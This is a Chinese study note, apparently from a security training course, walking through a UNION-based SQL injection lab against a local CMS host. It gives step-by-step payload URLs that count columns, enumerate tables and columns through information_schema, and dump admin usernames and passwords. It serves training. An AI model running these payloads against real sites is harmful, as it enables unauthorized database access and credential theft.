NSATP-A学习笔记之Day3-3SQL联合查询

文章目录

简单的sql注入漏洞

实验目的

  • 练习sql注入

  • 实验环境

    wamp

    • IP:172.16.12.2

实验工具

  • 火狐浏览器:是一款非常流行的internet浏览器
  • 蚁剑:是一款专业的网站管理软件,本次试验主要用到其动态脚本管理功能
  • hackbar:Hackbar是一个Firefox的插件,是一种简单的安全审计/渗透测试工具。此工具栏将帮助您测试SQL注入
information_schema
			|
			+--	tables
			|		|
			|		`-- table_name
			|		|
			|		`-- table_schema
			|		
			`-- columns	
					|
					`--	column_name
					|
					`--	table_name
					|
					`-- table_schema

实验内容

1、访问172.16.12.2

NSATP-A学习笔记之Day3-3SQL联合查询

2、点开一个页面(如公司介绍),发现通过typeid.php页面传递typeid参数来访问页面,这里可能是个注入点
NSATP-A学习笔记之Day3-3SQL联合查询
NSATP-A学习笔记之Day3-3SQL联合查询

3、测试寻找注入点

   Payload:http://172.16.12.2/typeid.php?typeid=1'%23
   发现

NSATP-A学习笔记之Day3-3SQL联合查询

4、Order by判断列数,判断出有5列

   Payload:http://172.16.12.2/typeid.php?typeid=1 order by 5%23

NSATP-A学习笔记之Day3-3SQL联合查询
NSATP-A学习笔记之Day3-3SQL联合查询
NSATP-A学习笔记之Day3-3SQL联合查询
NSATP-A学习笔记之Day3-3SQL联合查询
NSATP-A学习笔记之Day3-3SQL联合查询

5、使用联合注入判断回显位,回显位为2

   Payload:
   http://172.16.12.2/typeid.php?typeid=-1 union select 1,2,3,4,5%23

NSATP-A学习笔记之Day3-3SQL联合查询

6、查看当前数据库名

   Payload:
   http://172.16.12.2/typeid.php?typeid=-1 union select 1,database(),3,4,5%23

NSATP-A学习笔记之Day3-3SQL联合查询

7、查看数据库下的表

   Payload:
   http://172.16.12.2/typeid.php?typeid=-1 union select 1,(select group_concat(table_name)from information_schema.columns where table_schema=database()),3,4,5%23

NSATP-A学习笔记之Day3-3SQL联合查询

8、查看jdy_admin表里的列

  Payload:
  http://172.16.12.2/typeid.php?typeid=-1 union select 1,(select group_concat(column_name)from  information_schema.columns where table_schema=database()and  table_name=jdy_admin),3,4,5%23

NSATP-A学习笔记之Day3-3SQL联合查询

发现没回显内容,我们尝试将表名进行16进制编码(0x6a64795f61646d696e)后再进行尝试

 Payload:
   http://172.16.12.2/typeid.php?typeid=-1 union select 1,(select group_concat(column_name)from  information_schema.columns where table_schema=database()and  table_name=0x6a64795f61646d696e),3,4,5%23

NSATP-A学习笔记之Day3-3SQL联合查询
NSATP-A学习笔记之Day3-3SQL联合查询

9、查看列中的数据username,password

  Payload:
http://172.16.12.2/typeid.php?typeid=-1 union select 1,(select group_concat(username,password)from jdycms.jdy_admin),3,4,5%23

NSATP-A学习笔记之Day3-3SQL联合查询

免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!

上一篇:dedecms在栏目页统计本栏目文章数


下一篇:C++ typeid运算符:获取类型信息